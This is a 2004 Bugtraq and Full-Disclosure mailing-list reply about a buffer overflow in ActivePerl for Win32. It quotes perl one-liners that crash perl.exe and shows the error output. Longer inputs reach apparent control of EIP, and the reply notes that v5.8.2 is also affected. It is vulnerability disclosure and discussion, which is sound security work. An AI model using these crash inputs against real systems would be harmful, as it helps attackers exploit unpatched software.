Date: Tue, 18 May 2004 20:30:46 +0545
From: npguy <npguy@...surfer.com.np>
To: Nick FitzGerald <nick@...us-l.demon.co.uk>
Cc: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com
Subject: Re: Re: Buffer Overflow in ActivePerl ?

perl, v5.8.2 MSWin32-x86-multi-thread suffers the same.

Tuesday, May 18, 2004, 7:14:41 PM, you wrote:

NF> "Oliver@...yhat.de" <Oliver@...yhat.de> wrote:

>> i played around with ActiveState's ActivePerl for Win32, and crashed
>> Perl.exe with the following command:
>>
>> perl -e "$a="A" x 256; system($a)"

NF> Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus
NF> all but last week's security patch:

NF> perl -e "$a="A" x 256; system($a)"

NF> perl.exe - Application error
NF> Unhandled instruction at "0x77fcc83d" referenced memory at
NF> "0x00657865. The memory could not be "written".

NF> Also, it is likely exploitable -- push up the number of A's a bit:

NF> C:\>perl -e "$a="A" x 259; system($a)"

NF> perl.exe - Application error
NF> Unhandled instruction at "0x77fcc83d" referenced memory at
NF> "0x65004141. The memory could not be "written".

NF> and we seem to get control of EIP. Coincidence? Try yet two more:

NF> C:\>perl -e "$a="A" x 261; system($a)"

NF> perl.exe - Application error
NF> Unhandled instruction at "0x77fcc83d" referenced memory at
NF> "0x41414141. The memory could not be "written".

NF> Looks like full control of EIP...

NF> However, there is not likely to be a privilege escalation here unless
NF> perhaps a script processor on a web server can be cajoled into doing
NF> something with this?? (Not at all familiar with the innards of Windows
NF> web servers and their relationship to their CGI, etc processors...)

npguy
npguy€websurfer.com.np

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html